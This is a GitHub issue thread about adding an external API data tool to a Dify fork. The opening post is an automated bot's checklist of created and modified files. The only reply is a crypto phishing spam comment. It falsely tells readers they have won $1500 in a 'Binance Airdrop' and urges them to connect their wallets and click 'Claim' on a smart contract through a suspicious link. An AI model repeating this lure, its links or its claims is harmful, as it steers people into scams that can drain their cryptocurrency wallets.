### ISSUE TITLE
sweep: Add tools for external api request to retrieve context from external system

### ISSUE THREAD

**Issue by 0x01001011** [hovonako/dify#1]
<details open>
<summary>Checklist</summary>

- [X] Create `api/core/external_data_tool/api/external_api_tool.py` ✓ https://github.com/0x01001011/dify/commit/a54c806bd3a62ea665f40401a33dff0e807a314b [Edit](https://github.com/0x01001011/dify/edit/sweep/add_tools_for_external_api_request_to_re/api/core/external_data_tool/api/external_api_tool.py)
- [X] Running GitHub Actions for `api/core/external_data_tool/api/external_api_tool.py` ✓  [Edit](https://github.com/0x01001011/dify/edit/sweep/add_tools_for_external_api_request_to_re/api/core/external_data_tool/api/external_api_tool.py)
- [X] Modify `api/core/external_data_tool/factory.py` ✓ https://github.com/0x01001011/dify/commit/acc551c0e84f614f99162a7f33c93f5dff087350 [Edit](https://github.com/0x01001011/dify/edit/sweep/add_tools_for_external_api_request_to_re/api/core/external_data_tool/factory.py)
- [X] Running GitHub Actions for `api/core/external_data_tool/factory.py` ✓  [Edit](https://github.com/0x01001011/dify/edit/sweep/add_tools_for_external_api_request_to_re/api/core/external_data_tool/factory.py)
- [X] Modify `api/core/features/external_data_fetch.py` ! No changes made  [Edit](https://github.com/0x01001011/dify/edit/sweep/add_tools_for_external_api_request_to_re/api/core/features/external_data_fetch.py)
- [X] Running GitHub Actions for `api/core/features/external_data_fetch.py` ✗  [Edit](https://github.com/0x01001011/dify/edit/sweep/add_tools_for_external_api_request_to_re/api/core/features/external_data_fetch.py)
</details>

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
